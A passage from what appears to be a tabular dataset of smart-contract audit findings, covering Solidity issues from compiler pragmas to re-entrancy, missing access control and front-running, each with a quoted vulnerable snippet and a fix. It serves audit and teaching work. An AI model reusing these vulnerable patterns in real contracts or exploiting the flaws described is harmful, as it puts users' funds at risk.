issues:\\nImplicitConstructorCallvalueCheck\\nTupleAssignmentMultiStackSlotComponents\\nMemoryArrayCreationOverflow\\nprivateCanBeOverridden\\nYulOptimizerRedundantAssignmentBreakContinue0.5\\nABIEncoderV2CalldataStructsWithStaticallySizedAndDynamicallyEncodedMembers\\nSignedArrayStorageCopy\\nABIEncoderV2StorageArrayWithMultiSlotElement\\nDynamicConstructorArgumentsClippedABIV2\\nCodebase declares compiler version ^0.5.2:\\n```\\npragma solidity ^0.5.2;\\npragma experimental ABIEncoderV2; // to enable structure-type parameters\\n```\\n\\nAccording to etherscan.io, the currently deployed main-net `AMM` contract is compiled with solidity version 0.5.8:\\nhttps://etherscan.io/address/0xb95B9fb0539Ec84DeD2855Ed1C9C686Af9A4e8b3#code",It is recommended to settle on the latest stable 0.6.x or 0.5.x version of the Solidity compiler and lock the pragma version to a specifically tested compiler release.,,```\\npragma solidity ^0.5.2;\\npragma experimental ABIEncoderV2; // to enable structure-type parameters\\n```\\n +AMM - ONE_WAD_U is never used,low,The const `ONE_WAD_U` is declared but never used. Avoid re-declaring the same constants in multiple source-units (and unit-test cases) as this will be hard to maintain.\\n```\\nuint256 private constant ONE\\_WAD\\_U = 10\\*\\*18;\\n```\\n,"Remove unused code. Import the value from a shared resource. E.g.ONE_WAD is declared multiple times in `LibMathSigned`, `LibMathUnsigned`, `AMM`, hardcoded in checks in `PerpetualGovernance.setGovernanceParameter`, `AMMGovernance.setGovernanceParameter`.",,```\\nuint256 private constant ONE\\_WAD\\_U = 10\\*\\*18;\\n```\\n +Perpetual - Variable shadowing in constructor,low,"`Perpetual` inherits from `PerpetualGovernance` and `Collateral`, which declare state variables that are shadowed in the `Perpetual` constructor.\\nLocal constructor argument shadows `PerpetualGovernance.globalConfig`, `PerpetualGovernance.devAddress`, `Collateral.collateral`\\nNote: Confusing name: `Collateral` is an inherited contract and a state variable.\\n```\\nconstructor(address globalConfig, address devAddress, address collateral, uint256 collateralDecimals)\\n public\\n Position(collateral, collateralDecimals)\\n{\\n setGovernanceAddress(""globalConfig"", globalConfig);\\n setGovernanceAddress(""dev"", devAddress);\\n emit CreatePerpetual();\\n}\\n```\\n",Rename the parameter or state variable.,,"```\\nconstructor(address globalConfig, address devAddress, address collateral, uint256 collateralDecimals)\\n public\\n Position(collateral, collateralDecimals)\\n{\\n setGovernanceAddress(""globalConfig"", globalConfig);\\n setGovernanceAddress(""dev"", devAddress);\\n emit CreatePerpetual();\\n}\\n```\\n" +Perpetual - The specified decimals for the collateral may not reflect the token's actual decimals Acknowledged,low,"When initializing the `Perpetual` contract, the deployer can decide to use either `ETH`, or an ERC20-compliant collateral. In the latter case, the deployer must provide a nonzero address for the token, as well as the number of `decimals` used by the token:\\n```\\nconstructor(address \\_collateral, uint256 decimals) public {\\n require(decimals <= MAX\\_DECIMALS, ""decimals out of range"");\\n require(\\_collateral != address(0x0) || (\\_collateral == address(0x0) && decimals == 18), ""invalid decimals"");\\n\\n collateral = \\_collateral;\\n scaler = (decimals == MAX\\_DECIMALS ? 1 : 10\\*\\*(MAX\\_DECIMALS - decimals)).toInt256();\\n}\\n```\\n\\nThe provided `decimals` value is not checked for validity and can differ from the actual token's `decimals`.",Ensure to establish documentation that makes users aware of the fact that the decimals configured are not enforced to match the actual tokens decimals. This is to allow users to audit the system configuration and decide whether they want to participate in it.,,"```\\nconstructor(address \\_collateral, uint256 decimals) public {\\n require(decimals <= MAX\\_DECIMALS, ""decimals out of range"");\\n require(\\_collateral != address(0x0) || (\\_collateral == address(0x0) && decimals == 18), ""invalid decimals"");\\n\\n collateral = \\_collateral;\\n scaler = (decimals == MAX\\_DECIMALS ? 1 : 10\\*\\*(MAX\\_DECIMALS - decimals)).toInt256();\\n}\\n```\\n" +AMM - Unchecked return value in ShareToken.mint Pending,low,"`ShareToken` is an extension of the Openzeppelin ERC20Mintable pattern which exposes a method called `mint()` that allows accounts owning the minter role to mint new tokens. The return value of `ShareToken.mint()` is not checked.\\nSince the ERC20 standard does not define whether this method should return a value or revert it may be problematic to assume that all tokens revert. If, for example, an implementation is used that does not revert on error but returns a boolean error indicator instead the caller might falsely continue without the token minted.\\nWe would like to note that the functionality is intended to be used with the provided `ShareToken` and therefore the contract is safe to use assuming `ERC20Mintable.mint` reverts on error. The issue arises if the system is used with a different `ShareToken` implementation that is not implemented in the same way.\\nOpenzeppelin implementation\\n```\\nfunction mint(address account, uint256 amount) public onlyMinter returns (bool) {\\n \\_mint(account, amount);\\n return true;\\n}\\n```\\n\\nCall with unchecked return value\\n```\\nfunction mintShareTokenTo(address guy, uint256 amount) internal {\\n shareToken.mint(guy, amount);\\n}\\n```\\n","Consider wrapping the `mint` statement in a `require` clause, however, this way only tokens that are returning a boolean error indicator are supported. Document the specification requirements for the `ShareToken` and clearly state if the token is expected to revert or return an error indicator.\\nIt should also be documented that the Token exposes a `burn` method that does not adhere to the Openzeppelin `ERC20Burnable` implementation. The `ERC20Burnable` import is unused as noted in issue 6.23.",,"```\\nfunction mint(address account, uint256 amount) public onlyMinter returns (bool) {\\n \\_mint(account, amount);\\n return true;\\n}\\n```\\n" +Perpetual - beginGlobalSettlement can be called multiple times Acknowledged,low,"The system can be put into emergency mode by an admin calling `beginGlobalSettlement` and providing a fixed `settlementPrice`. The method can be invoked even when the contract is already in `SETTLING` (emergency) mode, allowing an admin to selectively adjust the settlement price again. This does not seem to be the intended behavior as calling the method again re-sets the status to `SETTLING`. Furthermore, it may affect users' behavior during the `SETTLING` phase.\\n```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, ""already settled"");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n",Emergency mode should only be allowed to be set once,,"```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, ""already settled"");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n" +Exchange - OrderStatus is never used,low,"The enum `OrderStatus` is declared but never used.\\n```\\nenum OrderStatus {EXPIRED, CANCELLED, FILLABLE, FULLY\\_FILLED}\\n```\\n",Resolution\\nThis issue was resolved by removing the unused code.\\nRemove unused code.,,"```\\nenum OrderStatus {EXPIRED, CANCELLED, FILLABLE, FULLY\\_FILLED}\\n```\\n" +LibMath - Inaccurate declaration of _UINT256_MAX,low,`LibMathUnsigned` declares `_UINT256_MAX` as `2^255-1` while this value actually represents `_INT256_MAX`. This appears to just be a naming issue.\\n(UINT256_MAX/2-1 => pos INT256_MAX; 2**256/2-1==2**255-1)\\n```\\nlibrary LibMathUnsigned {\\n uint256 private constant \\_WAD = 10\\*\\*18;\\n uint256 private constant \\_UINT256\\_MAX = 2\\*\\*255 - 1;\\n```\\n,Rename `_UINT256_MAX` to `_INT256MAX` or `_SIGNED_INT256MAX`.,,```\\nlibrary LibMathUnsigned {\\n uint256 private constant \\_WAD = 10\\*\\*18;\\n uint256 private constant \\_UINT256\\_MAX = 2\\*\\*255 - 1;\\n```\\n +LibMath - inconsistent assertion text and improve representation of literals with many digits Acknowledged,low,"The assertion below states that `logE only accepts v <= 1e22 * 1e18` while the argument name is `x`. In addition to that we suggest representing large literals in scientific notation.\\n```\\nfunction wln(int256 x) internal pure returns (int256) {\\n require(x > 0, ""logE of negative number"");\\n require(x <= 10000000000000000000000000000000000000000, ""logE only accepts v <= 1e22 \\* 1e18""); // in order to prevent using safe-math\\n int256 r = 0;\\n uint8 extra\\_digits = longer\\_digits - fixed\\_digits;\\n```\\n",Update the inconsistent assertion text `v` -> `x` and represent large literals in scientific notation as they are otherwise difficult to read and review.,,"```\\nfunction wln(int256 x) internal pure returns (int256) {\\n require(x > 0, ""logE of negative number"");\\n require(x <= 10000000000000000000000000000000000000000, ""logE only accepts v <= 1e22 \\* 1e18""); // in order to prevent using safe-math\\n int256 r = 0;\\n uint8 extra\\_digits = longer\\_digits - fixed\\_digits;\\n```\\n" +LibMath - roundHalfUp returns unfinished result,low,"The method `LibMathSigned.roundHalfUp(int `x`, int y)` returns the value `x` rounded up to the base `y`. The method suggests that the result is the rounded value while that's not actually true. The result for a positive `x` is `x` + base/2 and `x` - base/2 for negative values. The rounding is not yet finished as this would require a final division by base `y` to manifest the rounding.\\nIt is assumed that the final rounding step is not executed for performance reasons. However, this might easily introduce errors when the caller assumes the result is rounded for base while it is not.\\n`roundHalfUp(-4700, 1000) = -4700` instead of `5000`\\n`roundHalfUp(4700, 1000) = 4700` instead of `5000`\\n```\\n// ROUND\\_HALF\\_UP rule helper. 0.5 ≈ 1, 0.4 ≈ 0, -0.5 ≈ -1, -0.4 ≈ 0\\nfunction roundHalfUp(int256 x, int256 y) internal pure returns (int256) {\\n require(y > 0, ""roundHalfUp only supports y > 0"");\\n if (x >= 0) {\\n return add(x, y / 2);\\n }\\n return sub(x, y / 2);\\n}\\n```\\n","We have verified the current code-base and the callers for `roundHalfUp` are correctly finishing the rounding step. However, it is recommended to finish the rounding within the method or document this behavior to prevent errors caused by code that falsely assumes that the returned value finished rounding.",,"```\\n// ROUND\\_HALF\\_UP rule helper. 0.5 ≈ 1, 0.4 ≈ 0, -0.5 ≈ -1, -0.4 ≈ 0\\nfunction roundHalfUp(int256 x, int256 y) internal pure returns (int256) {\\n require(y > 0, ""roundHalfUp only supports y > 0"");\\n if (x >= 0) {\\n return add(x, y / 2);\\n }\\n return sub(x, y / 2);\\n}\\n```\\n" +LibMath/LibOrder - unused named return value,low,"The following methods declare a named return value but explicitly return a value instead. The named return value is not used.\\n`LibMathSigned.min()`\\n`LibMathSigned.max()`\\n`LibMathUnsigned.min()`\\n`LibMathUnsigned.max()`\\n`LibOrder.getOrderHash()`\\n`LibOrder.hashOrder()`\\n```\\nfunction min(int256 x, int256 y) internal pure returns (int256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(int256 x, int256 y) internal pure returns (int256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n\\n```\\nfunction min(uint256 x, uint256 y) internal pure returns (uint256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n\\n```\\nfunction getOrderHash(Order memory order) internal pure returns (bytes32 orderHash) {\\n orderHash = LibEIP712.hashEIP712Message(hashOrder(order));\\n return orderHash;\\n}\\n```\\n\\n```\\nfunction hashOrder(Order memory order) internal pure returns (bytes32 result) {\\n bytes32 orderType = EIP712\\_ORDER\\_TYPE;\\n // solium-disable-next-line security/no-inline-assembly\\n assembly {\\n let start := sub(order, 32)\\n let tmp := mload(start)\\n mstore(start, orderType)\\n result := keccak256(start, 224)\\n mstore(start, tmp)\\n }\\n return result;\\n}\\n```\\n",Remove the named return value and explicitly return the value.,,"```\\nfunction min(int256 x, int256 y) internal pure returns (int256 z) {\\n return x <= y ? x : y;\\n}\\n\\nfunction max(int256 x, int256 y) internal pure returns (int256 z) {\\n return x >= y ? x : y;\\n}\\n```\\n" +Commented code exists in BMath,low,"```\\nuint tokenInRatio = bdiv(newTokenBalanceIn, tokenBalanceIn);\\n\\n// uint newPoolSupply = (ratioTi ^ weightTi) \\* poolSupply;\\nuint poolRatio = bpow(tokenInRatio, normalizedWeight);\\n```\\n\\n```\\nuint normalizedWeight = bdiv(tokenWeightOut, totalWeight);\\n// charge exit fee on the pool token side\\n// pAiAfterExitFee = pAi\\*(1-exitFee)\\nuint poolAmountInAfterExitFee = bmul(poolAmountIn, bsub(BONE, EXIT\\_FEE));\\n```\\n\\nAnd many more examples.","Remove the commented code, or address them properly. If the code is related to exit fee, which is considered to be 0 in this version, this style should be persistent in other contracts as well.",,"```\\nuint tokenInRatio = bdiv(newTokenBalanceIn, tokenBalanceIn);\\n\\n// uint newPoolSupply = (ratioTi ^ weightTi) \\* poolSupply;\\nuint poolRatio = bpow(tokenInRatio, normalizedWeight);\\n```\\n" +Max weight requirement in rebind is inaccurate,low,"`BPool.rebind` enforces `MIN_WEIGHT` and `MAX_WEIGHT` bounds on the passed-in `denorm` value:\\n```\\nfunction rebind(address token, uint balance, uint denorm)\\n public\\n \\_logs\\_\\n \\_lock\\_\\n{\\n\\n require(msg.sender == \\_controller, ""ERR\\_NOT\\_CONTROLLER"");\\n require(\\_records[token].bound, ""ERR\\_NOT\\_BOUND"");\\n require(!\\_finalized, ""ERR\\_IS\\_FINALIZED"");\\n\\n require(denorm >= MIN\\_WEIGHT, ""ERR\\_MIN\\_WEIGHT"");\\n require(denorm <= MAX\\_WEIGHT, ""ERR\\_MAX\\_WEIGHT"");\\n require(balance >= MIN\\_BALANCE, ""ERR\\_MIN\\_BALANCE"");\\n```\\n\\n`MIN_WEIGHT` is `1 BONE`, and `MAX_WEIGHT` is `50 BONE`.\\nThough a token weight of `50 BONE` may make sense in a single-token system, `BPool` is intended to be used with two to eight tokens. The sum of the weights of all tokens must not be greater than `50 BONE`.\\nThis implies that a weight of `50 BONE` for any single token is incorrect, given that at least one other token must be present.","`MAX_WEIGHT` for any single token should be `MAX_WEIGHT` - MIN_WEIGHT, or `49 BONE`.",,"```\\nfunction rebind(address token, uint balance, uint denorm)\\n public\\n \\_logs\\_\\n \\_lock\\_\\n{\\n\\n require(msg.sender == \\_controller, ""ERR\\_NOT\\_CONTROLLER"");\\n require(\\_records[token].bound, ""ERR\\_NOT\\_BOUND"");\\n require(!\\_finalized, ""ERR\\_IS\\_FINALIZED"");\\n\\n require(denorm >= MIN\\_WEIGHT, ""ERR\\_MIN\\_WEIGHT"");\\n require(denorm <= MAX\\_WEIGHT, ""ERR\\_MAX\\_WEIGHT"");\\n require(balance >= MIN\\_BALANCE, ""ERR\\_MIN\\_BALANCE"");\\n```\\n" +Test code present in the code base,medium,"Test code are present in the code base. This is mainly a reminder to fix those before production.\\n`rescuerAddress` and `freezerAddress` are not even in the function arguments.\\n```\\nwhitelistingAddress = \\_whitelistingAddress;\\nprojectAddress = \\_projectAddress;\\nfreezerAddress = \\_projectAddress; // TODO change, here only for testing\\nrescuerAddress = \\_projectAddress; // TODO change, here only for testing\\n```\\n",Resolution\\nFixed in lukso-network/[email protected]edb880c.\\nMake sure all the variable assignments are ready for production before deployment to production.,,"```\\nwhitelistingAddress = \\_whitelistingAddress;\\nprojectAddress = \\_projectAddress;\\nfreezerAddress = \\_projectAddress; // TODO change, here only for testing\\nrescuerAddress = \\_projectAddress; // TODO change, here only for testing\\n```\\n" +frozenPeriod is subtracted twice for calculating the current price,medium,"If the contract had been frozen, the current stage price will calculate the price by subtracting the `frozenPeriod` twice and result in wrong calculation.\\n`getCurrentBlockNumber()` subtracts `frozenPeriod` once, and then `getStageAtBlock()` will also subtract the same number again.\\n```\\nfunction getCurrentStage() public view returns (uint8) {\\n return getStageAtBlock(getCurrentBlockNumber());\\n}\\n```\\n\\n```\\nfunction getCurrentBlockNumber() public view returns (uint256) {\\n return uint256(block.number)\\n .sub(frozenPeriod); // make sure we deduct any frozenPeriod from calculations\\n}\\n```\\n\\n```\\nfunction getStageAtBlock(uint256 \\_blockNumber) public view returns (uint8) {\\n\\n uint256 blockNumber = \\_blockNumber.sub(frozenPeriod); // adjust the block by the frozen period\\n```\\n",Resolution\\nFound in parallel to the audit team and has been mitigated in lukso-network/[email protected]ebc4bce . The issue was further simplified by adding `getCurrentEffectiveBlockNumber()` in lukso-network/[email protected]e4c9ed5 to remove ambiguity when calculating current block number.\\nMake sure `frozenPeriod` calculation is done correctly. It could be solved by renaming `getCurrentBlockNumber()` to reflect the calculation done inside the function.\\ne.g. :\\n`getCurrentBlockNumber()` : gets current block number\\n`getCurrentEffectiveBlockNumber()` : calculates the effective block number deducting `frozenPeriod`,,```\\nfunction getCurrentStage() public view returns (uint8) {\\n return getStageAtBlock(getCurrentBlockNumber());\\n}\\n```\\n +Gold order size should be limited,high,"When a user submits an order to buy gold cards, it's possible to buy a huge amount of cards. `_commit` function uses less gas than `mineGolds`, which means that the user can successfully commit to buying this amount of cards and when it's time to collect them, `mineGolds` function may run out of gas because it iterates over all card IDs and mints them:\\n```\\n// Mint gold cards\\nskyweaverAssets.batchMint(\\_order.cardRecipient, \\_ids, amounts, """");\\n```\\n",Resolution\\nAddressed in horizon-games/SkyWeaver-contracts#9 by adding a limit for cold cards amount in one order.\\nLimit a maximum gold card amount in one order.,,"```\\n// Mint gold cards\\nskyweaverAssets.batchMint(\\_order.cardRecipient, \\_ids, amounts, """");\\n```\\n" +Price and refund changes may cause failures,high,"Price and refund for gold cards are used in 3 different places: commit, mint, refund.\\nWeave tokens spent during the commit phase\\n```\\nfunction \\_commit(uint256 \\_weaveAmount, GoldOrder memory \\_order)\\n internal\\n{\\n // Check if weave sent is sufficient for order\\n uint256 total\\_cost = \\_order.cardAmount.mul(goldPrice).add(\\_order.feeAmount);\\n uint256 refund\\_amount = \\_weaveAmount.sub(total\\_cost); // Will throw if insufficient amount received\\n```\\n\\nbut they are burned `rngDelay` blocks after\\n```\\n// Burn the non-refundable weave\\nuint256 weave\\_to\\_burn = (\\_order.cardAmount.mul(goldPrice)).sub(\\_order.cardAmount.mul(goldRefund));\\nweaveContract.burn(weaveID, weave\\_to\\_burn);\\n```\\n\\nIf the price is increased between these transactions, mining cards may fail because it should burn more `weave` tokens than there are tokens in the smart contract. Even if there are enough tokens during this particular transaction, someone may fail to melt a gold card later.\\nIf the price is decreased, some `weave` tokens will be stuck in the contract forever without being burned.",Store `goldPrice` and `goldRefund` in `GoldOrder`.,,"```\\nfunction \\_commit(uint256 \\_weaveAmount, GoldOrder memory \\_order)\\n internal\\n{\\n // Check if weave sent is sufficient for order\\n uint256 total\\_cost = \\_order.cardAmount.mul(goldPrice).add(\\_order.feeAmount);\\n uint256 refund\\_amount = \\_weaveAmount.sub(total\\_cost); // Will throw if insufficient amount received\\n```\\n" +Re-entrancy attack allows to buy EternalHeroes cheaper,high,"When buying eternal heroes in `_buy` function of `EternalHeroesFactory` contract, a buyer can do re-entracy before items are minted.\\n```\\nuint256 refundAmount = \\_arcAmount.sub(total\\_cost);\\nif (refundAmount > 0) {\\n arcadeumCoin.safeTransferFrom(address(this), \\_recipient, arcadeumCoinID, refundAmount, """");\\n}\\n\\n// Mint tokens to recipient\\nfactoryManager.batchMint(\\_recipient, \\_ids, amounts\\_to\\_mint, """");\\n```\\n\\nSince price should increase after every `N` items are minted, it's possible to buy more items with the old price.",Add re-entrancy protection or mint items before sending the refund.,,"```\\nuint256 refundAmount = \\_arcAmount.sub(total\\_cost);\\nif (refundAmount > 0) {\\n arcadeumCoin.safeTransferFrom(address(this), \\_recipient, arcadeumCoinID, refundAmount, """");\\n}\\n\\n// Mint tokens to recipient\\nfactoryManager.batchMint(\\_recipient, \\_ids, amounts\\_to\\_mint, """");\\n```\\n" +Supply limitation misbehaviors,medium,"In `SWSupplyManager` contract, the `owner` can limit supply for any token ID by setting maxSupply:\\n```\\nfunction setMaxSupplies(uint256[] calldata \\_ids, uint256[] calldata \\_newMaxSupplies) external onlyOwner() {\\n require(\\_ids.length == \\_newMaxSupplies.length, ""SWSupplyManager#setMaxSupply: INVALID\\_ARRAYS\\_LENGTH"");\\n\\n // Can only \\*decrease\\* a max supply\\n // Can't set max supply back to 0\\n for (uint256 i = 0; i < \\_ids.length; i++ ) {\\n if (maxSupply[\\_ids[i]] > 0) {\\n require(\\n 0 < \\_newMaxSupplies[i] && \\_newMaxSupplies[i] < maxSupply[\\_ids[i]],\\n ""SWSupplyManager#setMaxSupply: INVALID\\_NEW\\_MAX\\_SUPPLY""\\n );\\n }\\n maxSupply[\\_ids[i]] = \\_newMaxSupplies[i];\\n }\\n\\n emit MaxSuppliesChanged(\\_ids, \\_newMaxSupplies);\\n}\\n```\\n\\nThe problem is that you can set `maxSupply` that is lower than `currentSupply`, which would be an unexpected state to have.\\nAlso, if some tokens are burned, their `currentSupply` is not decreasing:\\n```\\nfunction burn(\\n uint256 \\_id,\\n uint256 \\_amount)\\n external\\n{\\n \\_burn(msg.sender, \\_id, \\_amount);\\n}\\n```\\n\\nThis unexpected behaviour may lead to burning all of the tokens without being able to mint more.",Properly track `currentSupply` by modifying it in `burn` function. Consider having a following restriction `require(_newMaxSupplies[i] > currentSupply[_ids[i]])` in `setMaxSupplies` function.,,"```\\nfunction setMaxSupplies(uint256[] calldata \\_ids, uint256[] calldata \\_newMaxSupplies) external onlyOwner() {\\n require(\\_ids.length == \\_newMaxSupplies.length, ""SWSupplyManager#setMaxSupply: INVALID\\_ARRAYS\\_LENGTH"");\\n\\n // Can only \\*decrease\\* a max supply\\n // Can't set max supply back to 0\\n for (uint256 i = 0; i < \\_ids.length; i++ ) {\\n if (maxSupply[\\_ids[i]] > 0) {\\n require(\\n 0 < \\_newMaxSupplies[i] && \\_newMaxSupplies[i] < maxSupply[\\_ids[i]],\\n ""SWSupplyManager#setMaxSupply: INVALID\\_NEW\\_MAX\\_SUPPLY""\\n );\\n }\\n maxSupply[\\_ids[i]] = \\_newMaxSupplies[i];\\n }\\n\\n emit MaxSuppliesChanged(\\_ids, \\_newMaxSupplies);\\n}\\n```\\n" +importScore() in IexecMaintenanceDelegate can be used to wrongfully reset worker scores Acknowledged,medium,"The import of worker scores from the previous PoCo system deployed on chain is made to be asynchronous. And, even though the pull pattern usually makes a system much more resilient, in this case, it opens up the possibility for an attack that undermines the trust-based game-theoretical balance the PoCo system relies on. As can be seen in the following function:\\n```\\nfunction importScore(address \\_worker)\\nexternal override\\n{\\n require(!m\\_v3\\_scoreImported[\\_worker], ""score-already-imported"");\\n m\\_workerScores[\\_worker] = m\\_workerScores[\\_worker].max(m\\_v3\\_iexecHub.viewScore(\\_worker));\\n m\\_v3\\_scoreImported[\\_worker] = true;\\n}\\n```\\n\\nA motivated attacker could attack the system providing bogus results for computation tasks therefore reducing his own reputation (mirrored by the low worker score that would follow).\\nAfter the fact, the attacker could reset its score to the previous high value attained in the previously deployed PoCo system (v3) and undo all the wrongdoings he had done at no reputational cost.","Resolution\\nUpdate from the iExec team:\\nIn order to perform this attack, one would first have to gain reputation on the new version, and lose it. They would then be able to restore its score from the old version.\\nWe feel the risk is acceptable for a few reasons:\\nIt can only be done once per worker\\nConsidering the score dynamics discussed in the “Trust in the PoCo” document, it is more interesting for a worker to import its reputation in the beginning rather then creating a new one, since bad contributions only remove part of the reputation\\nOnly a handful of workers have reputation in the old system (180), and their score is low (average 7, max 22)\\nWe might force the import all 180 workers with reputation >0. A script to identify the relevant addresses is already available.\\nCheck that each worker interacting with the PoCo system has already imported his score. Otherwise import it synchronously with a call at the time of their first interaction.",,"```\\nfunction importScore(address \\_worker)\\nexternal override\\n{\\n require(!m\\_v3\\_scoreImported[\\_worker], ""score-already-imported"");\\n m\\_workerScores[\\_worker] = m\\_workerScores[\\_worker].max(m\\_v3\\_iexecHub.viewScore(\\_worker));\\n m\\_v3\\_scoreImported[\\_worker] = true;\\n}\\n```\\n" +Domain separator in iExecMaintenanceDelegate has a wrong version field Acknowledged,medium,"The domain separator used to comply with the EIP712 standard in `iExecMaintenanceDelegate` has a wrong version field.\\n```\\nfunction \\_domain()\\ninternal view returns (IexecLibOrders\\_v5.EIP712Domain memory)\\n{\\n return IexecLibOrders\\_v5.EIP712Domain({\\n name: ""iExecODB""\\n , version: ""3.0-alpha""\\n , chainId: \\_chainId()\\n , verifyingContract: address(this)\\n });\\n}\\n```\\n\\nIn the above snippet we can see the code is still using the version field from an old version of the PoCo protocol, `""3.0-alpha""`.","Resolution\\nIssue was fixed in iExecBlockchainComputing/[email protected]ebee370\\nChange the version field to: `""5.0-alpha""`",,"```\\nfunction \\_domain()\\ninternal view returns (IexecLibOrders\\_v5.EIP712Domain memory)\\n{\\n return IexecLibOrders\\_v5.EIP712Domain({\\n name: ""iExecODB""\\n , version: ""3.0-alpha""\\n , chainId: \\_chainId()\\n , verifyingContract: address(this)\\n });\\n}\\n```\\n" +The updateContract() method in ERC1538UpdateDelegate is incorrectly implemented,low,"The `updateContract()` method in `ERC1538UpdateDelegate` does not behave as intended for some specific streams of bytes (meant to be parsed as function signatures).\\nThe mentioned function takes as input, among other things, a `string` (which is, canonically, a dynamically-sized `bytes` array) and tries to parse it as a conjunction of function signatures.\\nAs is evident in:\\n```\\nif (char == 0x3B) // 0x3B = ';'\\n```\\n\\nInside the function, `;` is being used as a “reserved” character, serving as a delimiter between each function signature.\\nHowever, if two semicolons are used in succession, the second one will not be checked and will be made part of the function signature being sent into the `_setFunc()` method.\\nExample of faulty input\\n`someFunc;;someOtherFuncWithSemiColon;`",Resolution\\nIssue was fixed in iExecBlockchainComputing/[email protected]e6be083\\nReplace the line that increases the `pos` counter at the end of the function:\\n```\\nstart = ++pos;\\n```\\n\\nWIth this line of code:\\n`start = pos + 1;`,,```\\nif (char == 0x3B) // 0x3B = ';'\\n```\\n +TokenStaking.recoverStake allows instant stake undelegation,high,"`TokenStaking.recoverStake` is used to recover stake that has been designated to be undelegated. It contains a single check to ensure that the undelegation period has passed:\\n```\\nfunction recoverStake(address \\_operator) public {\\n uint256 operatorParams = operators[\\_operator].packedParams;\\n require(\\n block.number > operatorParams.getUndelegationBlock().add(undelegationPeriod),\\n ""Can not recover stake before undelegation period is over.""\\n );\\n```\\n\\nHowever, if an undelegation period is never set, this will always return true, allowing any operator to instantly undelegate stake at any time.",Require that the undelegation period is nonzero before allowing an operator to recover stake.,,"```\\nfunction recoverStake(address \\_operator) public {\\n uint256 operatorParams = operators[\\_operator].packedParams;\\n require(\\n block.number > operatorParams.getUndelegationBlock().add(undelegationPeriod),\\n ""Can not recover stake before undelegation period is over.""\\n );\\n```\\n" +tbtc - No access control in TBTCSystem.requestNewKeep,high,"`TBTCSystem.requestNewKeep` is used by each new `Deposit` contract on creation. It calls `BondedECDSAKeepFactory.openKeep`, which sets the `Deposit` contract as the “owner,” a permissioned role within the created keep. `openKeep` also automatically allocates bonds from members registered to the application. The “application” from which member bonds are allocated is the tbtc system itself.\\nBecause `requestNewKeep` has no access controls, anyone can request that a keep be opened with `msg.sender` as the “owner,” and arbitrary signing threshold values:\\n```\\n/// @notice Request a new keep opening.\\n/// @param \\_m Minimum number of honest keep members required to sign.\\n/// @param \\_n Number of members in the keep.\\n/// @return Address of a new keep.\\nfunction requestNewKeep(uint256 \\_m, uint256 \\_n, uint256 \\_bond)\\n external\\n payable\\n returns (address)\\n{\\n IBondedECDSAKeepVendor \\_keepVendor = IBondedECDSAKeepVendor(keepVendor);\\n IBondedECDSAKeepFactory \\_keepFactory = IBondedECDSAKeepFactory(\\_keepVendor.selectFactory());\\n return \\_keepFactory.openKeep.value(msg.value)(\\_n, \\_m, msg.sender, \\_bond);\\n}\\n```\\n\\nGiven that the owner of a keep is able to seize signer bonds, close the keep, and more, having control of this role could be detrimental to group members.","Resolution\\nIssue addressed in keep-network/tbtc#514. Each call to `requestNewKeep` makes a check that `uint(msg.sender)` is an existing `TBTCDepositToken`. Because these tokens are only minted in `DepositFactory`, `msg.sender` would have to be one of the cloned deposit contracts.\\nAdd access control to `requestNewKeep`, so that it can only be called as a part of the `Deposit` creation and initialization process.",,"```\\n/// @notice Request a new keep opening.\\n/// @param \\_m Minimum number of honest keep members required to sign.\\n/// @param \\_n Number of members in the keep.\\n/// @return Address of a new keep.\\nfunction requestNewKeep(uint256 \\_m, uint256 \\_n, uint256 \\_bond)\\n external\\n payable\\n returns (address)\\n{\\n IBondedECDSAKeepVendor \\_keepVendor = IBondedECDSAKeepVendor(keepVendor);\\n IBondedECDSAKeepFactory \\_keepFactory = IBondedECDSAKeepFactory(\\_keepVendor.selectFactory());\\n return \\_keepFactory.openKeep.value(msg.value)(\\_n, \\_m, msg.sender, \\_bond);\\n}\\n```\\n" +Unpredictable behavior due to front running or general bad timing,high,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nSome instances of this are more important than others, but in general users of the system should have assurances about the behavior of the action they're about to take.\\nSystem Parameters\\nThe owner of the `TBTCSystem` contract can change system parameters at any time with changes taking effect immediately.\\n`setSignerFeeDivisor` - stored in the deposit contract when creating a new deposit. emits an event.\\n`setLotSizes` - stored in the deposit contract when creating a new deposit. emits an event.\\n`setCollateralizationThresholds` - stored in the deposit contract when creating a new deposit. emits an event.\\nThis also opens up an opportunity for malicious owner to:\\ninterfere with other participants deposit creation attempts (front-running transactions)\\ncraft a series of transactions that allow the owner to set parameters that are more beneficial to them, then create a deposit and reset the parameters to the systems' initial settings.\\n```\\n/// @notice Set the system signer fee divisor.\\n/// @param \\_signerFeeDivisor The signer fee divisor.\\nfunction setSignerFeeDivisor(uint256 \\_signerFeeDivisor)\\n external onlyOwner\\n{\\n require(\\_signerFeeDivisor > 9, ""Signer fee divisor must be greater than 9, for a signer fee that is <= 10%."");\\n signerFeeDivisor = \\_signerFeeDivisor;\\n emit SignerFeeDivisorUpdated(\\_signerFeeDivisor);\\n}\\n```\\n\\nUpgradables\\nThe proxy pattern used in many places throughout the system allows the operator to set a new implementation which takes effect immediately.\\n```\\n/\\*\\*\\n \\* @dev Upgrade current implementation.\\n \\* @param \\_implementation Address of the new implementation contract.\\n \\*/\\nfunction upgradeTo(address \\_implementation)\\n public\\n onlyOwner\\n{\\n address currentImplementation = implementation();\\n require(\\_implementation != address(0), ""Implementation address can't be zero."");\\n require(\\_implementation != currentImplementation, ""Implementation address must be different from the current one."");\\n setImplementation(\\_implementation);\\n emit Upgraded(\\_implementation);\\n}\\n```\\n\\n```\\n/// @notice Upgrades the current vendor implementation.\\n/// @param 